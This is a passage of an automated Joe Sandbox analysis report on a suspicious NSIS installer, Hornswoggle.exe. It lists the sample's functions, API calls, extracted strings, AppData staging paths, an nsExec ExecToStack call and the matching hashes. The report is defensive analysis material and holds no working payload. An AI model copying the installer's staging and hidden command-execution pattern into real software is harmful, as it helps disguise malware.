CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189

Strings

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 0040211D

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls
API String ID: 123533781-1499438891
Opcode ID: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
Instruction ID: 56974f308a9a67f015f648966d3a58154011754483a046e15126684feee28a9b
Opcode Fuzzy Hash: 814b7ea8dca6599385978487c0f202a2bde9097081401cb59e3c034f0ab4e669
Instruction Fuzzy Hash: 255138B5A00208BFCF10DFA4C988A9D7BB5FF48318F20856AF515EB2D1DB799941CB54

Function 004064AE Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
Instruction ID: 4218cb5ebcdace98cdb1216374bea5ca06482cd82b52ee1cf8be947d1aeb6f3c
Opcode Fuzzy Hash: a0a3870b215c6cb57f5be28c47361f52d581e4686ba2b9b0247380936f8f490c
Instruction Fuzzy Hash: 29F17570D00269CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D3785A96CF44

Function 00406167 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(75923410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,75923410,?,75922EE0,00405725,?,75923410,75922EE0), ref: 00406172
FindClose.KERNEL32(00000000), ref: 0040617E

Strings

C:\, xrefs: 00406167

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction ID: 121c98e09340d698ac486e65b2e2524f4cd38212b93dde10f2a633de382b9f18
Opcode Fuzzy Hash: f9303f41664d55177506eb3caad4b25aa18344ea0c32c7844788a1b00efad07c
Instruction Fuzzy Hash: 82D012319190207FC34117396C0C84B7A589F653317528B33F86AF52F0D3349CA286ED

Function 00403B75 Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BB1
ShowWindow.USER32(?), ref: 00403BCE
DestroyWindow.USER32 ref: 00403BE2
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BFE
GetDlgItem.USER32(?,?), ref: 00403C1F
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C33
IsWindowEnabled.USER32(00000000), ref: 00403C3A
GetDlgItem.USER32(?,00000001), ref: 00403CE8
GetDlgItem.USER32(?,00000002), ref: 00403CF2
SetClassLongA.USER32(?,000000F2,?), ref: 00403D0C
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D5D
GetDlgItem.USER32(?,00000003), ref: 00403E03
ShowWindow.USER32(00000000,?), ref: 00403E24
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E36
EnableWindow.USER32(?,?), ref: 00403E51
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E67
EnableMenuItem.USER32(00000000), ref: 00403E6E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E86
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E99
lstrlenA.KERNEL32(Festremser Setup: Completed,?,Festremser Setup: Completed,00422F20), ref: 00403EC2
SetWindowTextA.USER32(?,Festremser Setup: Completed), ref: 00403ED1
ShowWindow.USER32(?,0000000A), ref: 00404005

Strings

Festremser Setup: Completed, xrefs: 00403EAE, 00403EB8, 00403EC1, 00403ECF
t"Q, xrefs: 00403F1F

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Festremser Setup: Completed$t"Q
API String ID: 3282139019-3637661019
Opcode ID: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
Opcode Fuzzy Hash: 5db2143f2917a894034b19fc2abb5fc3ef727a551cec3093833a2ac212f5d40f
Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E

Function 004037E3 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229

lstrcatA.KERNEL32(1033,Festremser Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Festremser Setup: Completed,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Hornswoggle.exe",00000000), ref: 0040385E
lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises,1033,Festremser Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Festremser Setup: Completed,00000000,00000002,75923410), ref: 004038D3
lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
GetFileAttributesA.KERNEL32(Remove folder: ), ref: 004038F1
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises), ref: 0040393A

Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE

RegisterClassA.USER32(00422EC0), ref: 00403977
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
ShowWindow.USER32(00000005,00000000), ref: 004039FA
GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
RegisterClassA.USER32(00422EC0), ref: 00403A3C
DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B

Strings

RichEd32, xrefs: 00403A0E
C:\Users\user\AppData\Local\Temp\, xrefs: 004037E8
RichEdit20A, xrefs: 00403A1E, 00403A24
1033, xrefs: 00403803, 00403859
"C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 004037E7
.DEFAULT\Control Panel\International, xrefs: 00403849
Remove folder: , xrefs: 004038A1, 004038A9, 004038B6, 00403900, 00403906
RichEd20, xrefs: 00403A00
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises, xrefs: 0040386D, 00403875, 0040390D, 00403913, 00403923
RichEdit, xrefs: 00403A2D
Control Panel\Desktop\ResourceLocale, xrefs: 00403817
_Nb, xrefs: 00403956, 004039BE
.exe, xrefs: 004038E0
Festremser Setup: Completed, xrefs: 0040380F, 00403815, 0040383A, 00403843, 00403858

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$Control Panel\Desktop\ResourceLocale$Festremser Setup: Completed$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-3577024421
Opcode ID: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
Opcode Fuzzy Hash: f321f38865debe7e05a28eb2188726e223bb839ce9309e8ec04d516c2c1b8f5e
Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D

Function 00402CB6 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402CCA
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Hornswoggle.exe,00000400), ref: 00402CE6

Part of subcall function 00405AD6: GetFileAttributesA.KERNELBASE(00000003,00402CF9,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00405ADA
Part of subcall function 00405AD6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Hornswoggle.exe,C:\Users\user\Desktop\Hornswoggle.exe,80000000,00000003), ref: 00402D2F
GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E76

Strings

Inst, xrefs: 00402D9D
C:\Users\user\AppData\Local\Temp\, xrefs: 00402CC0, 00402E8E
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
Null, xrefs: 00402DAF
soft, xrefs: 00402DA6
"C:\Users\user\Desktop\Hornswoggle.exe", xrefs: 00402CB6
C:\Users\user\Desktop\Hornswoggle.exe, xrefs: 00402CD0, 00402CDF, 00402CF3, 00402D10
Error launching installer, xrefs: 00402D06
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
C:\Users\user\Desktop, xrefs: 00402D11, 00402D16, 00402D1C

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Hornswoggle.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 2803837635-3688864595
Opcode ID: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
Opcode Fuzzy Hash: 2876f998b4df774fb1c5612d1fda4f3509dfd8569b4d56476e84d5951189c2aa
Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C

Function 00405E85 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,004050B4,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000), ref: 00405F36
GetSystemDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FB1
GetWindowsDirectoryA.KERNEL32(Remove folder: ,00000400), ref: 00405FC4
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
SHGetPathFromIDListA.SHELL32(00000000,Remove folder: ), ref: 0040600E
CoTaskMemFree.OLE32(00000000), ref: 00406019
lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,004050B4,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000), ref: 0040608D

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406035
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F80
error, xrefs: 00406065
Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\, xrefs: 00405EB4
=CQ, xrefs: 00405E92
Remove folder: , xrefs: 00405EAC, 00405F7E, 00405F9B, 00405FB0, 00405FC3, 00405FDF, 0040600A, 0040603A, 00406040, 00406058, 0040606B, 00406086, 0040608C, 00406097, 004060C1

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: =CQ$Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$error
API String ID: 900638850-350484749
Opcode ID: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
Instruction ID: a8b5a8e5c19b1295dd56f0f1fbd515d1e85c9865fba9c5a77ffde0f73355f29a
Opcode Fuzzy Hash: d636f2ff673ad150710af49f9aba5b8caeaeebcde03bf82713dac66827127ef6
Instruction Fuzzy Hash: DE6123B1A40502ABDF219F24CC84BBB3BB4DB45354F15813BE902B62D1D37D4952DB5E

Function 00401751 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,00000031), ref: 00401790
CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls,00000000,00000000,00000031), ref: 004017BA

Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Strings

C:\Users\user\AppData\Local\Temp\nsx8391.tmp, xrefs: 0040179B, 0040180A, 00401828
ExecToStack, xrefs: 0040176D, 00401783, 00401795, 004017A6, 004017DC, 004017F2, 00401810, 00401850, 004018D1, 004018DA, 004018E4, 004018EF
C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls, xrefs: 0040177E
error, xrefs: 00401805, 00401811, 00401829
C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll, xrefs: 0040181E, 0040183A

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsx8391.tmp$C:\Users\user\AppData\Local\Temp\nsx8391.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls$ExecToStack$error
API String ID: 1941528284-2511906002
Opcode ID: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
Opcode Fuzzy Hash: 1de87f895a20518b32872598fb73e011091ef9609ce5172346e4bbfbe8c97d7e
Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD

Function 0040507C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,00000000,00000000,00000000), ref: 004050D8
SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\), ref: 004050EA
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Strings

Remove folder: C:\Users\user\AppData\Local\Temp\nsx8391.tmp\, xrefs: 0040509C, 004050AE, 004050B4, 004050D7, 004050E3

Memory Dump Source

Source File: 00000000.00000002.2030977891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2030944661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031001950.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031014482.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2031119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
